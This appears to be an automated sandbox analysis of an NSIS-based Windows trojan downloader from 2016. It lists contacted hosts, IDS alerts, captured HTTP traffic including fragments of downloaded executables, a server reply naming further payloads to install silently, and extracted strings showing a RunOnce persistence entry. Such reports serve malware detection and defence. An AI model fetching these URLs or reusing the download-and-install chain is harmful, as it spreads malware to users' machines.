hxxp://sstatic1.histats.com/0.gif?2601603&101 208.43.241.179
hxxp://data.biphysics.com/r?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 52.72.165.251
hxxp://data.biphysics.com/r/?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 52.72.165.251
hxxp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483 95.211.189.16
hxxp://download-servers.com/SysInfo/Validate.exe 95.211.189.16
hxxp://livestatscounter.com/Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 95.211.210.34
hxxp://livestatscounter.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= 95.211.210.34


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET MALWARE Possible Windows executable sent when remote host claims to send html content

Traffic

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4958\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:32 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4959\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:32 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4960\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:32 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:32 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4961\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:33 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Fri, 29 Apr 2016 11:27:33 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}..


GET /vuupc/dl.php?rr=APc1&sct=AGR&data=null&r=ap_100_nc&prm=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 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 11:27:31 GMT
Content-Type: text/html
Content-Length: 253819
Connection: keep-alive
X-Powered-By: PHP/5.5.32
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......<...x...x
...x.......z...x...........i...,...t.......y...Richx..................
.PE..L......K.................\....9.....?2.......p....@..............
.............J..............................................s........J
......................................................................
........p...............................text....[.......\.............
..... ..`.rdata.......p.......`..............@[email protected]..........
[email protected]...`...0:..........................rsrc......
...J......v..............@..@.........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
Pr@..}[email protected]... M.......M....3.....FQ.....NU..M..
........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@
..u....E..9}[email protected].}[email protected]
[email protected]@.W...E..E.h [email protected]...\r@._
^3.[.....L$...'z...Si.....VW.T.....tO.q.3.;5.'z.sB..i......D.......t.G
.....t...O..t .....u...3....3...F.....;5.'z.r._^[...U..QQ.U.SV..i.

<<< skipped >>>

GET /0.gif?2601603&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CountUid=8e9f4111-e1ii-4571-8690-c110302ee59f


HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
GIF89a.............!.......,...........D..;..


GET /Generic/vos.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 302 Moved Temporarily
Server: nginx/1.6.2
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Location: hXXp://livestatscounter.com/Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst=
0......



GET /Generic/sys/vos_n.php?ch=NOCHPC&rdsn=0&idn=1&sid=&isnw=2&civ=2&or=&pac=&guidv=2&vpname=&prdk=&tst= HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: livestatscounter.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.32
3d1..hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483..hXXp://
bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14eXh4amFmZmp6dWJ4bWl7InNpZCI6IjYy
NjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSwic3ViX2lkIjoiMCIsInNpbGVudCI6Ij
EiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxYjUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1
In0..hXXp://software-repository.com/Generic/zgm.php?sid=8100001../inst
all..hXXp://down.eszju.cn/8001/ttwifi.exe..{5DB9279D5A0CB29AA3ED55D055
708882}..hXXps://vnl1.izabelcoin.com/vnl1.exe../PID=1670 /S..hXXp://d2
xvc2nqkduarq.cloudfront.net/main/clc_jq.exe../c=clc /i=106 /s..hXXp://
livestatscounter.com/SysInfo/validator/timer.php..hXXp://livestatscoun
ter.com/Generic/lvsd.php?sid=775876CDDF-XXDFEE-DAASD&ch=CM2..hXXp://dl
.samplayeedmed.com/download/dwn/firas/en/setup_mpck_en.exe../verysilen
t..hXXp://down.hejie123.com/global/yeaplayer.exe..hXXp://VVV.liuzhoua.
com/shanghaiuc3.exe..hXXp://cloudfront.7950a1a535832c52ae50f09d3e42473
4190ffb39.xyz/download/EasyHotSpot_6f3cb237d2152f9e9.exe....0..HTTP/1.
1 200 OK..Server: nginx/1.6.2..Date: Fri, 29 Apr 2016 11:27:34 GMT..Co
ntent-Type: text/html..Transfer-Encoding: chunked..Connection: keep-al
ive..X-Powered-By: PHP/5.5.32..3d1..hXXp://mobilitydata5.com/SysInfo/t
em.php?sid=83837567483..hXXp://bapo.labst.ru/YXRpeGJidWV0Y29tZ29jcG14e
Xh4amFmZmp6dWJ4bWl7InNpZCI6IjYyNjIiLCJjb21wYW5pZXMiOnsiMTg0MSI6WzFdfSw
ic3ViX2lkIjoiMCIsInNpbGVudCI6IjEiLCJ2ZXIiOiIxIiwicm5kMCI6IjI0NjE0ODYxY
jUxMzEzZjc3MmI1ODUyOGMzNmMzMGU1In0..hXXp://software-repository.com/Gen
eric/zgm.php?sid=8100001../install..hXXp://down.eszju.cn/8001/ttwi

<<< skipped >>>

GET /SysInfo/tem.php?sid=83837567483 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: mobilitydata5.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: application/octet-stream
Content-Length: 80466
Connection: keep-alive
X-Powered-By: PHP/5.5.32
Content-Transfer-Encoding: binary
Content-Disposition: attachment; filename=tJEcW
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................t...z...B...8............@..............
............`&...........@.................................@........@&
......................`...............................................
........................................text....r.......t.............
..... ..`.rdata..n .......,...x..............@[email protected].... ...........
[email protected]......
..@&.....................@[email protected][email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ

<<< skipped >>>

GET /r?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=dXJsPXt7aHR0cDovL2QzODltNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:30 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=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&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.8.1</center>..</body>..</html>..>....



GET /r/?_=1461929224467&pid=10732314-17&evt=IW:Init&type=&ch=ap_100_nc&browser=C&prm=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&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
2..ok..0......



GET /r?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:31 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.8.1</center>..</body>..</html>..>....



GET /r/?_=1461929226483&pid=10732314-17&evt=IW:c1&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:31 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
2..ok..0..HTTP/1.1 200 OK..Server: nginx/1.8.1..Date: Fri, 29 Apr 2016
11:27:31 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Co
nnection: keep-alive..X-Powered-By: PHP/5.5.9-1ubuntu4.14..2..ok..0..<
/font>....



GET /r?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 301 Moved Permanently
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: text/html
Content-Length: 184
Location: hXXp://data.biphysics.com/r/?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Connection: keep-alive
<html>..<head><title>301 Moved Permanently</title
></head>..<body bgcolor="white">..<center><h1&
gt;301 Moved Permanently</h1></center>..<hr><cent
er>nginx/1.8.1</center>..</body>..</html>..>....



GET /r/?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37 HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)
Host: data.biphysics.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.1
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.5.9-1ubuntu4.14
2..ok..0..HTTP/1.1 200 OK..Server: nginx/1.8.1..Date: Fri, 29 Apr 2016
11:27:34 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Co
nnection: keep-alive..X-Powered-By: PHP/5.5.9-1ubuntu4.14..2..ok..0..


GET /0.gif?2601768&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: CountUid=8e9f4111-e1ii-4571-8690-c110302ee59f


HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
GIF89a.............!.......,...........D..;..


GET /SysInfo/Validate.exe HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: download-servers.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.8.0
Date: Fri, 29 Apr 2016 11:27:33 GMT
Content-Type: application/octet-stream
Content-Length: 61981
Last-Modified: Fri, 15 Apr 2016 08:03:32 GMT
Connection: keep-alive
ETag: "5710a054-f21d"
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................^...........0.......p....@.........
................. ...............................................t....
.......C..............................................................
.............p...............................text...L\.......^........
.......... ..`.rdata.......p.......b..............@[email protected]\......
.....v..............@....ndata...................................rsrc.
...C.......D...z..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h ...Pj.h`[email protected]...\r@._^3.
[.....L$....B...Si.....VW.T.....tO.q.3.;5..B.sB..i......D.......t.G...
..t...O..t .....u...3....3...F.....;5..B.r._^[...U..QQ.U.SV..i....

<<< skipped >>>

GET /0.gif?2601800&101 HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: sstatic1.histats.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Type: image/gif
Content-Length: 43
Connection: close
Set-Cookie: CountUid=8e9f4111-e1ii-4571-8690-c110302ee59f; domain=.histats.com; Max-Age=31536000; Expires=Sat, 29-Apr-2017 11:27:34 GMT
GIF89a.............!.......,...........D..;..


POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 115
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1726\",\"channel_id\": \"\", \"utm_addition\":\"v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:33 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}....



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 126
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1727\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"tst=&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:33 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Fri, 29 Apr 2016 11:27:33 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}
....



POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded
User-Agent: NSIS_Inetc (Mozilla)
Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
Content-Length: 182
Connection: Keep-Alive
Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
HTTP/1.1 200 OK
Access-Control-Allow-Methods: GET,HEAD,PUT,POST,DELETE
Access-Control-Allow-Origin: *
Content-Type: application/json; charset=utf-8
Date: Fri, 29 Apr 2016 11:27:34 GMT
Content-Length: 15
Connection: keep-alive
{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Methods: GET,HEAD
,PUT,POST,DELETE..Access-Control-Allow-Origin: *..Content-Type: applic
ation/json; charset=utf-8..Date: Fri, 29 Apr 2016 11:27:34 GMT..Conten
t-Length: 15..Connection: keep-alive..{"Status":"OK"}..


The Trojan connects to the servers at the following location(s):

%original file name%.exe_856:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw18.tmp
netc.dll
0732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
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&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
Software\Microsoft\Windows\CurrentVersion\RunOnce
r.dll
nstall.exe
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe /runonce
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd3.tmp\inetc.dll
or.dll
OLEAUT32.dll
GetProcessHeap
GetCPInfo
GetConsoleOutputCP
IpConfig.dll
zcÁ
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
L%sDL'y
qk.RQk
1ve%s
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw18.tmp
nsw18.tmp
aed3248e8f04ac2affda17.exe
2C7DF~1.EXE
ments and Settings\"%CurrentUserName%"\Application Data\InstallW\Full_Setup.exe /runonce
6-6726-ADB2-5C02-3742FA8A8B37
tNGw1YjV3bGNiLmNsb3VkZnJvbnQubmV0L2FwbHBtb3YuaHRtbD9jaD1hcF8xMDAmYXV0bz0xJmRwPS1fLVpHUTRNVjgwTkY4eE5EWXlYekUwT0RGZlEwRmZNVGMwTGpnNUxqazVMakV3Tmw5bVlXVmZOelU0Tmw5QlJGTS1fLUxxT1B0bWJmc3d0enZ3YkVxU2Fpb2FGY2JHZmFfRlNhRHphay1WX19KRWJhQWRkWXB2c3RHbW4xeVFPcmdhS3JKV3EwT3FjOTB0WTBidGVkSnlNQU1hSk1ucWluaUFiaWFPYTAwYWRhamtVbmprTFF3RF82ZUxRNkxEcVo4azhRUG13M3RxUGJJb25YeUhKYWxVZzZiT0d3amprYnNpaGU1MGdLU21tcXRIdXd6MzIxTUxBSTNrS2lFYkFCYjJsdWNJSWVwc01HYWh3THNteXpQVmJ3SUp0SGJPQmdHR1NnWFpqTmlDSWV4emZzSDFmcnE3c0hiSTNuRGpTNTZuTGZaMkNSS0kxSmZreFh3MHU4N3ZvSmsxeXFKWjRqaGVmRUFiZlJLeFU4WlJ6Y1lpc01HTF95T2wzemFuRVZYSG5tMHNMb3VzOTZZZTA2SVZtTVk4azByY0dHZU9JaTBxbXNrcTQyY2MwTUtSS0Jzam1XMzdib3BvYmdFcjBlZmpuV3FmelFwaG5mc1htRVFha2Q4YVhyTXBXUFVHdG5GN043Zl9qM29mY2Z2cWc0YVhHfX0=
mY2Z2cWc0YVhHfX0=&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
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
1 2 3 4 5 6 7 8 9 10 11
tion Data\InstallW\Full_Setup.exe
tp://data.biphysics.com/r?_=1461929230014&pid=10732314-17&evt=IW:dlc&v=A7914D56-6726-ADB2-5C02-3742FA8A8B37
3 4 5 6 7 8 9 10 11
DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsw18.tmp
c:\%original file name%.exe
%Documents and Settings%\%current user%\Application Data\InstallW
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd3.tmp
10732314-17
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
%Documents and Settings%\%current user%\Application Data\InstallW\Full_Setup.exe
)-.Yln
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><dependency><dependentAssembly><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="X86" publicKeyToken="6595b64144ccf1df" language="*" /></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="requireAdministrator" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
1.0.0.0

nsoA.tmp_240:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp
360TotalSecurity.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu10.tmp\inetc.dll
hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
hXXp://download-servers.com/partners/360/360TotalSecurity.exe
%s - %s
(Err=%d)
NSIS_Inetc (Mozilla)
Filename: %s
/password
Uploading %s
8!8-8B8I8}8
@.reloc
HttpSendRequestA
HttpSendRequestExA
HttpQueryInfoA
FtpCreateDirectoryA
FtpOpenFileA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpEndRequestA
InternetCrackUrlA
WININET.dll
inetc.dll
Open URL Error
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
REST %d
SIZE %s
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Proxy-authorization: basic %s
%s:%s
FtpCommandA
wininet.dll
%u MB
%u kB
%u bytes
%d:d:d
u.Uj@
MSVCRT.dll
URL Parts Error
FtpCreateDir failed (550)
Error FTP path (550)
Downloading %s
%UXn5
.jL J
#vWeB0,
.qo8KT
kRV%D
>aO.nF
k%UO^
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb19.tmp
nsb19.tmp
://livestatscounter.com/Generic/vos.php?ch=
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsg16.tmp
Uninstall.exe
n.php?r=vu_vo2_
mobilitydata5.com/SysInfo/tem.php?sid=83837567483
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp /idn
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp
nsoA.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoE.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsu10.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsoA.tmp
{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483&v=2\"}"}
hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com
url=hXXp://mobilitydata5.com/SysInfo/tem.php?sid=83837567483
